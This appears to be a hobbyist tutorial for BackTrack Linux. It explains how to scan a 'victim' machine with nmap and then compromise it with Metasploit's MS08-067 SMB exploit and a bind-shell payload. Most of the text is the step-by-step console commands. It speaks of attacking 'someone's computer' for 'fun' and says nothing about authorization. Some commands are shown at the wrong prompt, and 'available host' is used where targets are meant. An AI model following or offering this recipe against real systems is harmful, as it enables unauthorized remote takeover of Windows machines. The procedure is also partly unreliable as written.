Metasploit is an open source project which provides information about the vulnerabilities.
And provides good exploits and payloads for the penetration testing.
What is nmap?
Nmap is a scanning tool. Which can be used to see which port is open on someone's computer.
Enough Basics... Let's begin the real fun!!!
Go To Backtrack, and just follow my instructions
First of all you need to start the networking in the backtrack. You can start it by this step,
root@bt:~# /etc/init.d/networking start
Now scan your victim whether it is on or not.
root@bt:~# nmap -sV -O <victim IP>
Now go to the directory framework3.
root@bt:~# cd /pentest/exploits/framework3
root@bt:~# msfconsole
Then you need to select the exploit which you want to apply on the target.
if you don't know which exploit to apply then
root@bt:~# show exploits
But I know which one to use so, I am using
windows/smb/ms08_067_netapi [using root@bt:~# search smb ]
root@bt:~# use windows/smb/ms08_067_netapi // this is the exploit
root@bt:~# set RHOST <victim IP>
Now one of the most important steps,
See the targets, here, target means the operating system on which you want to attack.
To see the available host, apply this command
root@bt:~# show targets
root@bt:~# set target <target number>
Now the most important thing, selecting payload.
Payload: Payload means the shell code by which you are going to exploit the host. Code that will be executed on the target system!
root@bt:~# set payload windows/shell_bind_tcp
root@bt:~# show options
root@bt:~# exploit